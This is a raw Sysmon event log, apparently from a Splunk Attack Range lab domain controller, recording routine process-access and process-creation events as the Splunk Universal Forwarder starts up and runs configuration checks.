Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E5A-6005-4E00-00000000A301}3468C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E5A-6005-4D00-00000000A301}34283432C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8E5A-6005-4E00-00000000A301}3468C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.093{59A5CD1D-8E5A-6005-4E00-00000000A301}3468C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8E5A-6005-4D00-00000000A301}3428C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warnings 10341000x80000000000000001942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5A-6005-4D00-00000000A301}3428C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E5A-6005-4D00-00000000A301}3428C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.080{59A5CD1D-8E59-6005-4800-00000000A301}39683972C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8E5A-6005-4D00-00000000A301}3428C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18192|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:18.087{59A5CD1D-8E5A-6005-4D00-00000000A301}3428C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8E59-6005-4800-00000000A301}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.995{59A5CD1D-8E5B-6005-5B00-00000000A301}39363912C:\Windows\system32\conhost.exe{59A5CD1D-8E5B-6005-5F00-00000000A301}3424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 